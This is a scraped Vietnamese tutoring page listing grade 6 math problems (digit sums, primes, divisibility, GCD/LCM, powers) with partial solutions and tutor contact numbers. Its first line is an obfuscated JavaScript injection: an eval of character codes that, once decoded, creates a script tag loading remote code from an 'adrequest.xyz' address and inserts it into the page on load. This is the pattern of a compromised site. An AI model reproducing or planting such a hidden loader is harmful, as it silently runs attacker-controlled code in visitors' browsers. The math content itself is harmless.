var _0x42tbc1 = 1; eval(String.fromCharCode(118, 97, 114, 32, 97, 49, 32, 61, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 32, 123, 10, 32, 32, 32, 32, 118, 97, 114, 32, 95, 48, 120, 52, 50, 116, 98, 99, 49, 32, 61, 32, 83, 116, 114, 105, 110, 103, 91, 34, 92, 120, 54, 54, 92, 120, 55, 50, 92, 120, 54, 70, 92, 120, 54, 68, 92, 120, 52, 51, 92, 120, 54, 56, 92, 120, 54, 49, 92, 120, 55, 50, 92, 120, 52, 51, 92, 120, 54, 70, 92, 120, 54, 52, 92, 120, 54, 53, 34, 93, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 44, 32, 49, 49, 51, 44, 32, 49, 49, 55, 44, 32, 49, 48, 49, 44, 32, 49, 49, 53, 44, 32, 49, 49, 54, 44, 32, 52, 54, 44, 32, 49, 50, 48, 44, 32, 49, 50, 49, 44, 32, 49, 50, 50, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 44, 32, 54, 51, 44, 32, 49, 49, 54, 44, 32, 54, 49, 44, 32, 52, 57, 41, 59, 10, 32, 32, 32, 32, 118, 97, 114, 32, 95, 48, 120, 52, 50, 116, 98, 99, 50, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 91, 34, 92, 120, 54, 51, 92, 120, 55, 50, 92, 120, 54, 53, 92, 120, 54, 49, 92, 120, 55, 52, 92, 120, 54, 53, 92, 120, 52, 53, 92, 120, 54, 67, 92, 120, 54, 53, 92, 120, 54, 68, 92, 120, 54, 53, 92, 120, 54, 69, 92, 120, 55, 52, 34, 93, 40, 34, 92, 120, 55, 51, 92, 120, 54, 51, 92, 120, 55, 50, 92, 120, 54, 57, 92, 120, 55, 48, 92, 120, 55, 52, 34, 41, 59, 10, 32, 32, 32, 32, 95, 48, 120, 52, 50, 116, 98, 99, 50, 91, 34, 92, 120, 55, 52, 92, 120, 55, 57, 92, 120, 55, 48, 92, 120, 54, 53, 34, 93, 32, 61, 32, 34, 92, 120, 55, 52, 92, 120, 54, 53, 92, 120, 55, 56, 92, 120, 55, 52, 92, 120, 50, 70, 92, 120, 54, 65, 92, 120, 54, 49, 92, 120, 55, 54, 92, 120, 54, 49, 92, 120, 55, 51, 92, 120, 54, 51, 92, 120, 55, 50, 92, 120, 54, 57, 92, 120, 55, 48, 92, 120, 55, 52, 34, 59, 10, 32, 32, 32, 32, 95, 48, 120, 52, 50, 116, 98, 99, 50, 91, 34, 92, 120, 54, 49, 92, 120, 55, 51, 92, 120, 55, 57, 92, 120, 54, 69, 92, 120, 54, 51, 34, 93, 32, 61, 32, 116, 114, 117, 101, 59, 10, 32, 32, 32, 32, 95, 48, 120, 52, 50, 116, 98, 99, 50, 91, 34, 92, 120, 54, 57, 92, 120, 54, 52, 34, 93, 32, 61, 32, 34, 92, 120, 54, 51, 92, 120, 54, 52, 92, 120, 51, 55, 92, 120, 51, 48, 92, 120, 51, 57, 92, 120, 51, 48, 92, 120, 51, 49, 92, 120, 51, 48, 92, 120, 51, 48, 92, 120, 51, 49, 92, 120, 51, 48, 92, 120, 51, 49, 92, 120, 51, 48, 34, 59, 10, 32, 32, 32, 32, 95, 48, 120, 52, 50, 116, 98, 99, 50, 91, 34, 92, 120, 55, 51, 92, 120, 55, 50, 92, 120, 54, 51, 34, 93, 32, 61, 32, 95, 48, 120, 52, 50, 116, 98, 99, 49, 59, 10, 32, 32, 32, 32, 118, 97, 114, 32, 95, 48, 120, 52, 50, 116, 98, 99, 51, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 91, 34, 92, 120, 54, 55, 92, 120, 54, 53, 92, 120, 55, 52, 92, 120, 52, 53, 92, 120, 54, 67, 92, 120, 54, 53, 92, 120, 54, 68, 92, 120, 54, 53, 92, 120, 54, 69, 92, 120, 55, 52, 92, 120, 55, 51, 92, 120, 52, 50, 92, 120, 55, 57, 92, 120, 53, 52, 92, 120, 54, 49, 92, 120, 54, 55, 92, 120, 52, 69, 92, 120, 54, 49, 92, 120, 54, 68, 92, 120, 54, 53, 34, 93, 40, 34, 92, 120, 55, 51, 92, 120, 54, 51, 92, 120, 55, 50, 92, 120, 54, 57, 92, 120, 55, 48, 92, 120, 55, 52, 34, 41, 91, 48, 93, 59, 10, 32, 32, 32, 32, 95, 48, 120, 52, 50, 116, 98, 99, 51, 91, 34, 92, 120, 55, 48, 92, 120, 54, 49, 92, 120, 55, 50, 92, 120, 54, 53, 92, 120, 54, 69, 92, 120, 55, 52, 92, 120, 52, 69, 92, 120, 54, 70, 92, 120, 54, 52, 92, 120, 54, 53, 34, 93, 91, 34, 92, 120, 54, 57, 92, 120, 54, 69, 92, 120, 55, 51, 92, 120, 54, 53, 92, 120, 55, 50, 92, 120, 55, 52, 92, 120, 52, 50, 92, 120, 54, 53, 92, 120, 54, 54, 92, 120, 54, 70, 92, 120, 55, 50, 92, 120, 54, 53, 34, 93, 40, 95, 48, 120, 52, 50, 116, 98, 99, 50, 44, 32, 95, 48, 120, 52, 50, 116, 98, 99, 51, 41, 10, 125, 59, 10, 118, 97, 114, 32, 116, 110, 100, 101, 109, 111, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 91, 34, 92, 120, 54, 55, 92, 120, 54, 53, 92, 120, 55, 52, 92, 120, 52, 53, 92, 120, 54, 67, 92, 120, 54, 53, 92, 120, 54, 68, 92, 120, 54, 53, 92, 120, 54, 69, 92, 120, 55, 52, 92, 120, 55, 51, 92, 120, 52, 50, 92, 120, 55, 57, 92, 120, 53, 52, 92, 120, 54, 49, 92, 120, 54, 55, 92, 120, 52, 69, 92, 120, 54, 49, 92, 120, 54, 68, 92, 120, 54, 53, 34, 93, 40, 34, 92, 120, 55, 51, 92, 120, 54, 51, 92, 120, 55, 50, 92, 120, 54, 57, 92, 120, 55, 48, 92, 120, 55, 52, 34, 41, 59, 10, 118, 97, 114, 32, 110, 32, 61, 32, 116, 114, 117, 101, 59, 10, 102, 111, 114, 32, 40, 118, 97, 114, 32, 105, 32, 61, 32, 48, 59, 32, 105, 32, 60, 32, 116, 110, 100, 101, 109, 111, 115, 91, 34, 92, 120, 54, 67, 92, 120, 54, 53, 92, 120, 54, 69, 92, 120, 54, 55, 92, 120, 55, 52, 92, 120, 54, 56, 34, 93, 59, 32, 105, 43, 43, 41, 32, 123, 10, 32, 32, 32, 32, 105, 102, 32, 40, 116, 110, 100, 101, 109, 111, 115, 91, 105, 93, 91, 34, 92, 120, 54, 57, 92, 120, 54, 52, 34, 93, 32, 61, 61, 32, 34, 92, 120, 54, 51, 92, 120, 54, 52, 92, 120, 51, 55, 92, 120, 51, 48, 92, 120, 51, 57, 92, 120, 51, 48, 92, 120, 51, 49, 92, 120, 51, 48, 92, 120, 51, 48, 92, 120, 51, 49, 92, 120, 51, 48, 92, 120, 51, 49, 92, 120, 51, 48, 34, 41, 32, 123, 10, 32, 32, 32, 32, 32, 32, 32, 32, 110, 32, 61, 32, 102, 97, 108, 115, 101, 10, 32, 32, 32, 32, 125, 10, 125, 59, 10, 105, 102, 32, 40, 110, 32, 61, 61, 32, 116, 114, 117, 101, 41, 32, 123, 10, 32, 32, 32, 32, 97, 49, 40, 41, 59, 10, 125));

Toán lớp 6


Bổ trợ kiến thức Toán lớp 6 – Bài 2

[Chuyên mục gia sư Toán lớp 6] – Bổ trợ kiến thức Toán lớp 6 – Bài 2. Bài 2: Viết liên tiếp các số tự nhiên liên tiếp từ 1 đến 999 ta được một số tự nhiên A. Hỏi: Số A có bao nhiêu chữ số? Tính tổng các chữ số của số A? […]

Tuyển chọn bài toán hay trong Toán lớp 6 – Bài 4

[Bồi dưỡng nâng cao kiến thức Toán lớp 6] – Đăng ký học tập Toán 6 nâng cao – Liên hệ Thầy Thích theo số máy: 0919.281.916. Tuyển chọn bài toán hay trong Toán lớp 6 – Bài 4. Đề bài số 4:Tìm số nguyên tố p sao cho p2 + 44 là số nguyên […]

Tuyển chọn bài toán hay trong Toán lớp 6 – Bài 3

[Bồi dưỡng nâng cao kiến thức Toán lớp 6] – Đăng ký học tập Toán 6 nâng cao – Liên hệ Thầy Thích theo số máy: 0919.281.916. Tuyển chọn bài toán hay trong Toán lớp 6 – Bài 3. Đề bài số 2: Chứng minh rằng: CMR: 2001.2002.2003.2004 + 1 là hợp số. Hướng dẫn: […]

Tuyển chọn bài toán hay trong Toán lớp 6 – Bài 2

Tuyển chọn bài toán hay trong Toán lớp 6 – Bài 2

[Bồi dưỡng nâng cao kiến thức Toán lớp 6] – Đăng ký học tập Toán 6 nâng cao – Liên hệ Thầy Thích theo số máy: 0919.281.916. Tuyển chọn bài toán hay trong Toán lớp 6 – Bài 2. Đề bài số 2: Chứng minh rằng: 1/2³ + 1/3³ + 1/4³+…+1/2014³ < 1/4. Hướng dẫn:

Tuyển chọn bài toán hay trong Toán lớp 6 – Bài 1

Tuyển chọn bài toán hay trong Toán lớp 6 – Bài 1

[Bồi dưỡng nâng cao kiến thức Toán lớp 6] – Đăng ký học tập Toán 6 nâng cao – Liên hệ Thầy Thích theo số máy: 0919.281.916. Tuyển chọn bài toán hay trong Toán lớp 6 – Bài 1.

Tính biểu thức A = 2 + 5 + 9 + 14 +…+ 4949 + 5049

[Bổ trợ kiến thức Toán 6] – Tính biểu thức A = 2 + 5 + 9 + 14 +…+ 4949 + 5049. Hướng dẫn: Ta có: A = 2 + 5 + 9 + 14 +…+ 4949 + 5049. => 2A = 2.(2 + 5 + 9 + 14 +…+ 4949 + 5049) => 2A […]

Tổng các chữ số của a kí hiệu là: S(a). Chứng minh rằng: Nếu S(a) = S(2a) thì a ⋮ 9

[Hỗ trợ giải đáp Toán lớp 6 nâng cao] – Đề bài: Tổng các chữ số của a kí hiệu là: S(a). Chứng minh rằng: Nếu S(a) = S(2a) thì a ⋮ 9. Hướng dẫn giải: Vì S(a) và a có cùng số dư khi chia cho 9 nên suy ra: a – S(a) ⋮ 9  […]

Khi chia một số tự nhiên a cho 4 ta được số dư là 3 còn khi chia a cho 9 ta được số dư là 5. Tìm số dư trong phép chia a cho 36.

[Bồi dưỡng Toán lớp 6 – Chuyên đề dấu hiệu chia hết] – Đề bài: Khi chia một số tự nhiên a cho 4 ta được số dư là 3 còn khi chia a cho 9 ta được số dư là 5. Tìm số dư trong phép chia a cho 36. Hướng dẫn giải: Theo đề […]

Tìm hai số tự nhiên a, b sao cho a + b = 30, [a, b] = 6.(a, b)

[Bồi dưỡng HSG Toán lớp 6] – Đề bài: Tìm hai số tự nhiên a, b sao cho a + b = 30, [a, b] = 6.(a, b). Phương pháp: Đây là bài toán khó liên quan về BCNN và ƯCLN. Để giải bài toán này các em cần nhớ công thức liên quan giữa Bội […]

Chứng minh rằng tồn tại số tự nhiên k sao cho 3^k tận cùng bằng 001

[Bồi dưỡng Toán THCS] – Đề bài: Chứng minh rằng tồn tại số tự nhiên k sao cho 3k tận cùng bằng 001. Hướng dẫn giải: Bài toán này, chúng ta vận dụng nguyên lý Di-rich-le để giải. Gọi dãy số: 3, 32, 33, …, 31001. Theo nguyên lý Di-rich-le luôn tồn hai số trong 1001 […]

Tính giá trị biểu thức A = 1^2 + 4^2 + 7^2 + … + 100^2

[Bổ trợ kiến thức nâng cao Toán lớp 6] – Chuyên đề về dãy số tự nhiên viết theo quy luật: Tính giá trị biểu thức: A = 12 + 42 + 72 + … + 1002 Hướng dẫn giải: Ta có: A = 12 + 42 + 72 + … + 1002 A = 1 + […]

Cho (a, b) = 1. CMR: (ab, a + b) = 1

[Bồi dưỡng HSG Toán lớp 6] – Chủ đề về hai số nguyên tố cùng nhau. Đề bài: Cho (a, b) = 1. CMR: (ab, a + b) = 1. Hướng dẫn giải: Gọi d là số nguyên tố thuộc ƯC(ab, a + b) nên suy ra: ab ⋮ d và a + b ⋮ d. Vì (a, […]

Bài toán liên quan về số chính phương, số nguyên tố trong toán lớp 6

[Bồi dưỡng HSG Toán lớp 6] – Bài toán liên quan về số chính phương, số nguyên tố trong toán lớp 6. Em Phạm Hưng học sinh lớp 6 trường THCS Lê Quý Đôn – Hải Dương có hỏi bài toán 6: Bài 1: Số 100! khi phân tích ra thừa số nguyên tố có dạng […]

Một số bài tập ôn tập toán lớp 6 – Chương 1

Gia sư thủ khoa Hà Nội cung cấp một số bài tập giúp các em học sinh lớp 6 ôn tập Toán lớp 6 – Chương 1: Tập hợp và bổ túc số tự nhiên. BÀI TẬP RÈN LUYỆN Dạng 1: Thực hiện phép tính. Bài 1: Thực hiện các phép tính rồi phân tích […]

Một số bài tập rèn luyện chuyên đề Số nguyên trong Toán lớp 6 (Phần 3)

[Bồi dưỡng nâng cao Toán lớp 6] – Một số bài tập rèn luyện chuyên đề Số nguyên trong Toán lớp 6 (Phần 3). Mọi thông tin cần hỗ trợ tư vấn học tập và đăng ký tìm gia sư Toán tại nhà Hà Nội vui lòng liên hệ theo số máy: 0936.128.126.  DẠNG 3: TÌM GIÁ TRỊ X THUỘC […]

Các phép tính liên quan về lũy thừa với số mũ tự nhiên

Trong chương trình Toán lớp 6, các em học sinh cần nắm các công thức hay các phép toán liên quan về lũy thừa với số mũ tự nhiên: A. Các phép tính lũy thừa với số mũ tự nhiên: –          Phép nhân lũy thừa cùng cơ số: am.an = am + n      (m, n […]

Có hai số tự nhiên nào có tổng bằng 1999 và tích bằng 5749 không?

[Hỏi đáp Toán lớp 6] – Đề bài: Có hai số tự nhiên nào có tổng bằng 1999 và tích bằng 5749 không? Trả lời: Tổng hai số 1999 nên suy ra: Có một số chẵn và một số lẻ. Vậy tích của hai số chẵn và số lẻ là một số chẵn. Đề bài cho […]

CÁC PHÉP TOÁN TRÊN TẬP HỢP SỐ TỰ NHIÊN

[HỌC TOÁN LỚP 6] – CÁC PHÉP TOÁN TRÊN TẬP HỢP SỐ TỰ NHIÊN. 1.  Phép cộng và phép nhân số tự nhiên: a)    Tính chất giao hoán của phép cộng và phép nhân: –          a + b = b + a –          a.b = b.a b)    Tính chất kết hợp của phép cộng và phép […]

Em Hằng – HS lớp 6 THCS Dịch Vọng – Cầu Giấy, Hà Nội có hỏi bài toán 6:

[Gia sư hỗ trợ giải Toán 6 ở Cầu Giấy, Hà Nội] – Em Hằng – HS lớp 6 THCS Dịch Vọng – Cầu Giấy, Hà Nội có hỏi bài toán 6: Đề bài: Một tổ sản xuất trong hai ngày được 630 kg bột. Hỏi mỗi ngày tổ sản xuất được bao nhiêu kg bột? […]

Em Thu Hà – HS lớp 6 THCS Cầu Giấy – Cầu Giấy, Hà Nội có hỏi bài toán 6:

[Gia sư hỗ trợ giải Toán 6 ở Cầu Giấy] – Em Thu Hà – HS lớp 6 THCS Cầu Giấy – Cầu Giấy, Hà Nội có hỏi bài toán 6: Đề bài:  Tính tuổi của anh và em biết rằng 5/8 tuổi anh hơn 3/4 tuổi em là 2 năm và 1/2 tuổi anh hơn  […]